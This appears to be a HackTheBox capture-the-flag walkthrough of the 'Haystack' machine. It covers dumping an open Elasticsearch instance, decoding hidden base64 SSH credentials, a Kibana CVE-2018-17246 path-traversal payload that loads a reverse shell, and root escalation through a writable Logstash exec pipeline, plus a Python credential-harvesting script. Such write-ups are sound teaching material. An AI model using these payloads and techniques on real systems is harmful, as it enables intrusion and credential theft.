HackTheBox Writeup — Haystack
Hello guys, I am Faisal Husaini. My username on HTB is “faisalelino”.
The IP of this box is 10.10.10.115
NMAP Results
nmap -sC -sV -oN nmap 10.10.10.115 -Pn
Browsing to the web server, we just see an image of a haystack and a needle, nothing else. Checking the page source we see
Nothing interesting, just the image file, so let's fetch the image itself.
Running file and binwalk on the image file we see
It reports JPEG image data as well as TIFF image data (the embedded EXIF block), so let's run strings on it
We see a base64 encoded string; let's decode it
We get a message in Spanish. Since I was born and raised in Spain, I know Spanish, and this sentence means “The needle in the haystack is ‘key’”.
Now, we saw in the NMAP results that port 9200 is open, so let's access it
We see that it is running Elasticsearch, and its REST API answers without any authentication. From a quick search we learn that all of its indices can be dumped with the elasticdump tool (an npm package, which you have to install manually on your box).
So we dump the data of Elasticsearch (every index, one JSON document per line) using the command
elasticdump --input=http://10.10.10.115:9200 --output=data.json --type=data
So we dumped the data into a file named data.json
Let's see what interesting things we got in it
So far, details of different employees etc. Scrolling down more
We see something in quotes, all of them in Spanish, and there were loads and loads of quotes here; although I know Spanish, reading all of these would take me forever.
Remember the string we got from the haystack picture, which told us that the needle in the haystack is the “key”, which in Spanish is “clave”. Since this is a pure CTF-style machine, the haystack is this pile of Spanish quotes and the needle is the “key”, i.e. “clave”.
So we grep the quotes for the word “clave”
We see two quotes; the first one translates to
This key cannot be lost, I save it here: cGFzczogc3BhbmlzaC5pcy5rZXk=
And the second quote translates to
I have to save the key for the machine: dXNlcjogc2VjdXJpdHkg
Both of them look like base64 encoded strings, so we decode them one by one
Both strings decode to a username and a password (note that the decoded username carries a trailing space, which has to be dropped), so let's try to SSH in with these credentials
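The grep-and-decode step above can be done in one pass over the elasticdump output, which is newline-delimited JSON with the document under `_source`. The script below is an added example, not part of the original writeup or of elasticdump: it walks every hit, keeps the string fields containing the needle word, pulls out any base64-looking tokens and decodes the ones that yield printable text. The sample dump is constructed for this example (the field name `quote` and the filler documents are assumptions; the two “clave” lines reuse the base64 values quoted above). Against the live box, Elasticsearch would also answer a plain `_search?q=clave` query, but working on the dumped file keeps the search offline and repeatable.

```python
import base64
import json
import re

# Constructed sample of `elasticdump --type=data` output: one hit per line.
# Index/field names are assumed for this example; the two base64 values are
# the ones found in the box's quotes.
SAMPLE_DUMP = "\n".join([
    json.dumps({"_index": "quotes", "_type": "quote", "_id": "1", "_score": 1,
                "_source": {"quote": "No hay mal que por bien no venga."}}),
    json.dumps({"_index": "quotes", "_type": "quote", "_id": "2", "_score": 1,
                "_source": {"quote": "Esta clave no se puede perder, la guardo aca: "
                                     "cGFzczogc3BhbmlzaC5pcy5rZXk="}}),
    json.dumps({"_index": "bank_account", "_type": "_doc", "_id": "3", "_score": 1,
                "_source": {"name": "Ana", "balance": 100}}),
    json.dumps({"_index": "quotes", "_type": "quote", "_id": "4", "_score": 1,
                "_source": {"quote": "Tengo que guardar la clave para la maquina: "
                                     "dXNlcjogc2VjdXJpdHkg"}}),
])

# A run of 8+ base64 characters, optional padding, not glued to other base64 chars.
B64_TOKEN = re.compile(r"(?<![A-Za-z0-9+/])[A-Za-z0-9+/]{8,}={0,2}(?![A-Za-z0-9+/=])")


def iter_hits(ndjson):
    """Yield one parsed hit per non-empty line of an elasticdump data file."""
    for line in ndjson.splitlines():
        line = line.strip()
        if line:
            yield json.loads(line)


def find_needles(ndjson, needle="clave"):
    """Return (index, id, text) for every string field in _source containing the needle."""
    out = []
    for hit in iter_hits(ndjson):
        for value in hit.get("_source", {}).values():
            if isinstance(value, str) and needle.lower() in value.lower():
                out.append((hit["_index"], hit["_id"], value))
    return out


def decode_b64_tokens(text):
    """Decode every base64-looking token that strictly validates and is printable ASCII."""
    found = []
    for m in B64_TOKEN.finditer(text):
        try:
            raw = base64.b64decode(m.group(0), validate=True)
        except ValueError:          # binascii.Error is a ValueError: bad length/padding
            continue
        if raw and all(32 <= b < 127 for b in raw):
            found.append(raw.decode("ascii"))
    return found


def harvest_credentials(ndjson, needle="clave"):
    """Turn 'key: value' strings hidden in the matching quotes into a dict.

    Values are stripped: the box's username decodes to 'security ' with a
    trailing space, which would break an SSH login if left in place.
    """
    creds = {}
    for _index, _doc_id, text in find_needles(ndjson, needle):
        for decoded in decode_b64_tokens(text):
            if ":" in decoded:
                key, value = decoded.split(":", 1)
                creds[key.strip()] = value.strip()
    return creds


if __name__ == "__main__":
    for index, doc_id, text in find_needles(SAMPLE_DUMP):
        print(f"{index}/{doc_id}: {text}")
    print(harvest_credentials(SAMPLE_DUMP))
```

Run it against a real `data.json` by replacing `SAMPLE_DUMP` with the file contents; the strict `validate=True` decode plus the printable-ASCII check keeps ordinary Spanish words from being mistaken for base64.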
We got in as the security user through SSH
The user flag was in the directory we landed in
Now we move on to the privilege escalation part
Privilege Escalation
Checking the services running on the box, we see
We see Kibana running, which goes together with Elasticsearch, and which we did not encounter during our NMAP scan, so it is only reachable from the box itself
Kibana usually runs on port 5601, as a quick Google search will tell you
Searching Google for CVEs related to Kibana, we find something interesting
I will post the link for a detailed analysis of this at the end of this writeup. Let's exploit this code execution via local file inclusion (CVE-2018-17246 in Kibana's Console plugin: the `apis` parameter is used to load a file as a Node module without sanitising the path)
So we can drop a JavaScript reverse shell on the box and have Kibana load it through the Console API as shown below, from our SSH session since port 5601 is not exposed, while our netcat listener waits for the callback
/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../…/../../../path/to/shell.js
So we get our curl request ready
Our shell looks like this
And then we start our netcat listener
As soon as we send the request, we get back a reverse shell
We got the reverse shell as kibana; to confirm, we use the id command
But this shell was not stable, so we went on to get a stable shell: from the Linux box we used the bash reverse shell one-liner from PentestMonkey and set up another listener
And then we get a more stable shell
Running one of the Linux enumeration scripts, we get something interesting
We see /etc/logstash/conf.d is writable, and when we check the permissions on that folder, we see
Root and the kibana group have permissions on it; looking further into the folder, we get
We see three files named “filter.conf”, “input.conf” and “output.conf”; checking the contents of each file, we see
The input file has a file input that picks up anything in the folder /opt/kibana whose name matches logstash_*, polling every 10 seconds
The output file has an exec output, so it will run whatever command the pipeline hands it
The filter file shows the line format we have to use (the pattern that extracts the command from the line), so we are set for our third and final reverse shell
Here we echo our command in the form the filter expects into /opt/kibana/logstash_lul, start our netcat listener, wait a few seconds, and see
We got a reverse shell, and this time as root, as confirmed above. Logstash runs as root, reads files from a directory the kibana user can write to, and pipes the extracted text into an exec output, which is the whole escalation. Let's get the root flag, which is usually located at /root/root.txt
This was really a hard box; I don't know how it was labeled as Easy and worth only 20 points, it should have been Medium.